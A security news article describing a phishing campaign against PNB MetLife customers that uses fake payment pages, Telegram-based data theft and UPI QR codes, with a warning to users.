A sophisticated phishing campaign is targeting PNB MetLife insurance customers, using fake payment gateways to steal personal information and redirect victims to fraudulent UPI transactions. The scam exploits the trusted reputation of PNB MetLife by creating convincing mobile-optimized payment portals that mimic legitimate premium payment services. The malicious pages accept policy numbers and customer details without validation, forwarding captured data to attackers through automated channels.
The phishing operation spreads primarily through SMS messages, but email and social media platforms may also be used. When victims land on the fake payment gateways, they encounter professionally designed interfaces requesting basic information such as name, policy number, and mobile number. The pages deliberately avoid backend verification, accepting arbitrary values to maintain the illusion of legitimacy.
The campaign uses real payment applications like PhonePe, Paytm, and Google Pay to complete fraudulent transactions, reducing victim suspicion and increasing the likelihood of successful financial theft. Behind the polished interface lies a sophisticated data exfiltration mechanism powered by Telegram Bot API, which silently transmits captured details to attacker-controlled Telegram channels.
The stolen data includes names, policy numbers, and mobile numbers, all transmitted instantly as victims complete each form field. The phishing flow then introduces urgency through countdown timers and QR code displays, pressuring victims to complete UPI payments quickly. The JavaScript generates UPI payment URIs dynamically, rendering them as scannable QR codes that direct funds to attacker-controlled accounts.
Advanced variants of this phishing campaign escalate beyond simple payment fraud into comprehensive banking credential harvesting. These sophisticated templates offer multiple options, creating the illusion of legitimate policy servicing, and request complete bank account details and debit card information. All submitted financial credentials are exfiltrated through the same Telegram infrastructure, transforming the operation from payment fraud into full-scale identity and financial data theft.
Security researcher Anurag Gawande identified multiple variants of this phishing scheme and revealed that attackers deployed these pages across free hosting platforms, enabling rapid deployment and rotation of malicious sites. The campaign demonstrates a clear evolution in financial fraud tactics, moving beyond simple credential theft to multi-stage operations that combine data exfiltration with direct payment manipulation. The use of real payment applications and Telegram infrastructure makes this threat particularly dangerous, and users are advised to be cautious when receiving suspicious messages or encountering unfamiliar payment gateways.